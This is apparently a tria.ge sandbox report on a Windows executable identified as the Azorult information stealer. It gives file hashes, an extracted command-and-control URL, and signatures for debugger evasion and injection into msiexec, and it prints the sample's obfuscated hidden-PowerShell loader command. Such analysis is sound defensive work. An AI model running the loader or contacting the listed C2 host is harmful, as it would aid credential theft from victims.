Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
94s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2025, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
-
Size
941KB
-
MD5
ab99e49a4471901468bbbd9ccf228de0
-
SHA1
2b7302e1b24a9994e2924e97e627c1f5de23eaaa
-
SHA256
8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34
-
SHA512
bcda816d71aab2b798ed2d2764099eea01ce51c9a276377a0d5ca3aed4aaf328d700204dbbc8539d16eb70529d390d7113e7700c98652caa4512c2979ef9313c
-
SSDEEP
24576:YuA8/BOypdAGTekMh6RJNBIQll+hQT2jiux5A:+IBOypdAGTRrRFIQlluQsxq
Malware Config
Extracted
azorult
http://b2csa.icu/PL341/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4448 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 2412 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 22 4432 msiexec.exe 24 4432 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4432 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4448 powershell.exe 4432 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4448 powershell.exe Token: SeIncreaseQuotaPrivilege 4448 powershell.exe Token: SeSecurityPrivilege 4448 powershell.exe Token: SeTakeOwnershipPrivilege 4448 powershell.exe Token: SeLoadDriverPrivilege 4448 powershell.exe Token: SeSystemProfilePrivilege 4448 powershell.exe Token: SeSystemtimePrivilege 4448 powershell.exe Token: SeProfSingleProcessPrivilege 4448 powershell.exe Token: SeIncBasePriorityPrivilege 4448 powershell.exe Token: SeCreatePagefilePrivilege 4448 powershell.exe Token: SeBackupPrivilege 4448 powershell.exe Token: SeRestorePrivilege 4448 powershell.exe Token: SeShutdownPrivilege 4448 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeSystemEnvironmentPrivilege 4448 powershell.exe Token: SeRemoteShutdownPrivilege 4448 powershell.exe Token: SeUndockPrivilege 4448 powershell.exe Token: SeManageVolumePrivilege 4448 powershell.exe Token: 33 4448 powershell.exe Token: 34 4448 powershell.exe Token: 35 4448 powershell.exe Token: 36 4448 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2412 wrote to memory of 4448 2412 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe 82 PID 2412 wrote to memory of 4448 2412 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe 82 PID 2412 wrote to memory of 4448 2412 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe 82 PID 4448 wrote to memory of 4432 4448 powershell.exe 91 PID 4448 wrote to memory of 4432 4448 powershell.exe 91 PID 4448 wrote to memory of 4432 4448 powershell.exe 91 PID 4448 wrote to memory of 4432 4448 powershell.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe"C:\Users\Admin\AppData\Local\Temp\8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\Admin\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4432
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
69KB
MD5dcd80eb1ad2e5394274ffdce163d4815
SHA1f409bb772f6fcace2ae9505dbf1764186178158f
SHA25616743054909c0b954adece9179b026560c1671db30e2cb397ddc4c3742c57bc4
SHA5128fa32c316430db3e59401add31221f2b46ef56732f1cbe8d02576cb140163b189b7effc43223f3f59de80bd936231b1032a4673980be7653ebe647e9ebaa1ed5
-
Filesize
351KB
MD59cae95341fee19c573b15cdeba15077b
SHA191cd113b2ff21cc6a1c2b11d0812080b61c6cb68
SHA2569cb1a6246f58400eb6c3319e2ca0524bd8392fa23e727439706dc77f7f021ee5
SHA51292464c29b5f4f652622c9b5ee74bfe706cbc3335892461c44effcf82902d7a4de5087c8d00724f6900f23f9d7ac8e3b990c82bd784e6ff8f1525940f55fe57c2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD551e63a9c5d6d230ef1c421b2eccd45dc
SHA1c499cdad5c613d71ed3f7e93360f1bbc5748c45d
SHA256cd8496a3802378391ec425dec424a14f5d30e242f192ec4eb022d767f9a2480f
SHA512c23d713c3c834b3397c2a199490aed28f28d21f5781205c24df5e1e32365985c8a55be58f06979df09222740ffa51f4da764ebc3d912cd0c9d56ab6a33cab522